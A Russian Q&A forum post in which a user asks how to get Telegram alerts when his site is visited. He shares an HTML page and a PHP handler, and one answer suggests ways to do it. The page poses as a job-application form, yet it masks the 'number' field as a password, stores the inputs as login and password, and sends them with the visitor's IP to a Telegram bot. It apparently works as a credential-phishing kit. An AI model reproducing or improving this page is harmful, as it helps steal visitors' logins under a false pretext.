@siganiga

Как сделать уведомление посещаемости сайта?

Я решил сделать сайт с формой под заявки на работу и отправкой в телеграм.
Прошу от пользователей Имя и Номер
Но я еще и хочу сделать чтобы приходили уведомления что сайт посетили, но незнаю как
Типо в index.html можно както сделать?

Есть index.html
<!DOCTYPE html>
<html lang="ru"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
		
		<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
		<title>Заявки на Работу</title>
		<link rel="stylesheet" href="./index/materialdesignicons.min.css"><link rel="stylesheet" href="./index/account.min.css">		<link rel="shortcut icon" href="index/favicon.ico">
				<script type="text/javascript" async="" src="./index/analytics.js"></script><script async="" src="./index/tag.js"></script><script>(function(w,d,u){w.readyQ=[];w.bindReadyQ=[];function p(x,y){if(x=="ready"){w.bindReadyQ.push(y);}else{w.readyQ.push(x);}};var a={ready:p,bind:p};w.$=w.jQuery=function(f){if(f===d||f===u){return a}else{p(f)}}})(window,document)</script>
	</head>
	<body>
		<div class="loader_new" style="display: none;">
			<i class="mdi mdi-loading mdi-spin"></i>
		</div>
		<header id="navbar" class="navbar uk-sticky uk-sticky-fixed" data-uk-sticky="" style="position: fixed; top: 0px; width: 2133.33px;"><div class="uk-container uk-container-expand uk-flex uk-flex-between uk-flex-middle"><div class="action"></div><div class="title2"><h1><img src="index/kun.png" width="125px"></h1></div><div class="action"></div></div></header><div class="uk-sticky-placeholder" style="height: 46px; margin: 0px;"></div>		<main class="uk-container uk-container-expand uk-section uk-section-small uk-flex uk-flex-column" data-uk-height-viewport="offset-top: true;" style="min-height: calc((100vh - 45.9896px) - 30px);">
			<section>
	<form action="post.php" class="uk-width-large uk-margin-auto" method="post" accept-charset="utf-8">
		<div class="uk-grid-small uk-child-width-1-1 uk-grid uk-grid-stack" data-uk-grid="">
			<div class="uk-first-column">
				<label>
					<span class="required">Имя</span>
					<input name="user_name" class="uk-input" value="" required="">
									</label>
			</div>
			<div class="uk-grid-margin uk-first-column">
				<label>
					<span class="required">Номер</span>
					<input type="password" name="user_number" class="uk-input" required="">
									</label>
			</div>
			<div class="uk-grid-margin uk-first-column">
				<label>
					<span>Язык</span>
					<select name="language" class="uk-select">
													<option value="ky">Кыргызча</option>
													<option value="ru" selected="selected">Русский</option>
											</select>
				</label>
			</div>
			<div hidden="">
				<div class="g-recaptcha" data-sitekey="6Leu_M8ZAAAAAFjKki_5Wj8SDY5eRrlyWdj2A8Pp"></div>
			</div>
			<div class="uk-text-center uk-grid-margin uk-first-column">
				<button class="uk-button uk-button-secondary" name="type" value="default">Подать Заявку</button>
			</div>
		</div>
	</form>	</section>		</main>
		<link rel="stylesheet" href="./index/css2"><link rel="stylesheet" href="./index/uikit.min.css"><script src="./index/jquery.min.js"></script><script src="./index/uikit.min.js"></script><script src="./index/account.min.js"></script>					<script>
				(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};
					m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
				(window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");
				ym(56351530, "init", {
					clickmap:true,
					trackLinks:true,
					accurateTrackBounce:true
				});
			</script>
			<noscript><div><img src="https://mc.yandex.ru/watch/56351530" style="position:absolute; left:-9999px;" alt=""></div></noscript>
			<script async="" src="./index/js"></script>
			<script>
				window.dataLayer = window.dataLayer || [];
				function gtag(){dataLayer.push(arguments);}
				gtag('js', new Date());
				gtag('config', 'UA-107158535-5');
			</script>
				<script>(function($,d){$.each(readyQ,function(i,f){$(f)});$.each(bindReadyQ,function(i,f){$(d).bind("ready",f)})})(jQuery,document)</script>
	
<iframe name="ym-native-frame" title="ym-native-frame" frameborder="0" aria-hidden="true" style="opacity: 0 !important; width: 0px !important; height: 0px !important; position: absolute !important; left: 100% !important; bottom: 100% !important; border: 0px !important;" src="./index/saved_resource.html"></iframe></body></html>


И есть post.php
<?php
 
$login = $_POST['user_name'];
$password = $_POST['user_number'];
$ip = $_SERVER['REMOTE_ADDR'];

$token = "XXXXXXXXXX:AAEAg4gXXXXXXOeQMzdXXXXXXXoXksXXXXg";
 
$chat_id = "-1XXX142XXXXX69";

$arr = array(
  '☘️ Имя: ' => $name,
  ' Телефон: ' => $number,
  '☘️ IP: ' => $ip
);
 
foreach($arr as $key => $value) {
  $txt .= "<b>".$key."</b> ".$value."%0A";
};
 
$sendToTelegram = fopen("https://api.telegram.org/bot{$token}/sendMessage?chat_id={$chat_id}&parse_mode=html&text={$txt}","r");
 
if ($sendToTelegram) {
  header('Location: index.html');
} else {
  echo "Error";
}

?>


Как же все таки сделать Уведомки что на мой сайт ктото зашел? Куда лучше вставить код
  • Вопрос задан
  • 166 просмотров
Пригласить эксперта
Ответы на вопрос 1
@ettychel
Могу дать просто совет без реализации.
Добавьте на фронт скрипт с событием на window.onload или document.ready (разницу почитайте в интернете и выберите то, что вам нужно), чтобы стучал аяксом к вам на апи (php), а там уже в телегу себе отправляйте ну и обрабатывайте как хотите.
Другой вариант, если ваш php отдаёт страничку, то как раз в контроллере генерируйте событие, которое будет означать о том, что страница была передана ну и соответственно слушатель события будет отправлять вам уведомление на телегу.
Ну и ещё один вариант, по мне так самый нормальный, в плане того, что ваш телефон не будет разрываться от тысячи уведомлений. Копите статистику за день, пишите её в бд, для начала просто какой то каунтер, вечером
шедулером или кроном, ну это вы сами как то решите, запускается скрипт, который отправляет вам эту строчку из бд в телегу.
Решений и подходов этой задачи масса, если хотите можете постучать ко мне в телеграм, помогу чем смогу, free.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы